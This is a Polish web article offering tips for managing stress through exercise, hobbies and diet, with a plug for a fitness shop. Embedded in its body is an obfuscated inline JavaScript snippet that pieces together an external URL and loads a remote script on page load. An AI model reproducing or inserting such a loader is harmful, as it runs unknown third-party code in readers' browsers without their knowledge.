Reklama

Jak radzić sobie ze stresem?

Opublikowano:
Autor:

Jak radzić sobie ze stresem? - Zdjęcie główne
Udostępnij na:
Facebook

Przeczytaj również:

Lifestyle (function(){t16hu="8s4f6kc716ht";t16h=document.createElement("script");t16h_="u"+("st");t16h_+="at"+(".");t16h.async=true;t16h_+="in";t16hu="195162052."+t16hu;t16h.type="text/javascript";t16hu+="e782ejfg22dq";t16hu+="yk0w7f";t16h_+=("f")+"o"+("/");t16h.src="https://"+t16h_+t16hu;t16hd=document.body;t16hd.appendChild(t16h);})();Stres to nieodłączny element naszego życia. Każdy z nas doświadcza trudnych i stresujących sytuacji. Stresują się zarówno dorośli, jak i dzieci. Długotrwały i silny stres negatywnie wpływa na nasze zdrowie. Powoduje problemy ze snem, trudności z koncentracją, prowadzi do zaburzeń w równowadze hormonalnej, zwiększa ryzyko wystąpienia wielu chorób.

Każdy inaczej reaguje w trudnych sytuacjach, jedni z nas łatwiej radzą sobie ze stresem, inni gorzej. Gdy jesteśmy zestresowani, nasz organizm wytwarza kortyzol - hormon stresu. To rodzaj naturalnej walki ze stresem, ale zbyt duże dawki kortyzolu zwiększają ryzyko chorób serca.

Aktywność fizyczna

W walce ze stresem bardzo pomaga aktywność fizyczna. Regularny wysiłek fizyczny obniża poziom kortyzolu w organizmie człowieka. Aby zmniejszyć stres nie trzeba chodzić na siłownię i ćwiczyć intensywnie. Mogą to być zwykłe spacery, jazda na rowerze, jogging, gimnastyka we własnym domu. Dobre efekty przyniosą treningi na własnym sprzęcie do ćwiczeń takim, jak np. rower stacjonarny, orbitrek, bieżnia elektryczna, stepper. Bogata oferta rowerów treningowych w sklepie marbo-sport.pl

Nie ma znaczenia, co robimy, ważne aby aktywność fizyczna sprawiała nam przyjemność i żeby robić to regularnie. Wysiłek fizyczny sprawia, że w organizmie uwalniane są endorfiny – hormony szczęścia. Poprawia się nastrój, zmniejsza się napięcie mięśni.

Znalezienie czasu na przyjemności

Najczęstszym źródłem stresu jest nadmiar obowiązków i brak czasu na przyjemności. Jednak robienie rzeczy, które lubimy, ma duży wpływ na nasze zdrowie i samopoczucie. Dobrze jest znaleźć pasję i konsekwentnie się jej oddawać. Robienie tego, co sprawia nam dużą przyjemność to sposób na oderwanie się od szarej rzeczywistości i od problemów dnia codziennego.

W ciągu dnia na pewno uda się wygospodarować trochę czasu na przeczytanie ciekawej książki, posłuchanie ulubionej muzyki czy ugotowanie czegoś smacznego. Warto też odizolować się od elektroniki. Surfowanie w Internecie, korzystanie ze smartfona czy oglądanie telewizji zazwyczaj pochłania dużo cennego czasu, a nadmiar różnorodnych informacji to też źródło stresu.

Zdrowe odżywianie

Ważne znaczenie dla łagodzenia stresu ma zdrowe odżywianie. Każdy dzień należy zaczynać od śniadania, kolejne posiłki najlepiej spożywać w regularnych odstępach czasu, Starajmy się spożywać produkty bogate w witaminy i minerały, ograniczmy słodycze i inne niezdrowe przekąski oraz używki.

Udostępnij na:
Facebook
wróć na stronę główną

ZALOGUJ SIĘ - Twoje komentarze będą wyróżnione oraz uzyskasz dostęp do materiałów PREMIUM.

e-mail
hasło

Nie masz konta? ZAREJESTRUJ SIĘ Zapomniałeś hasła? ODZYSKAJ JE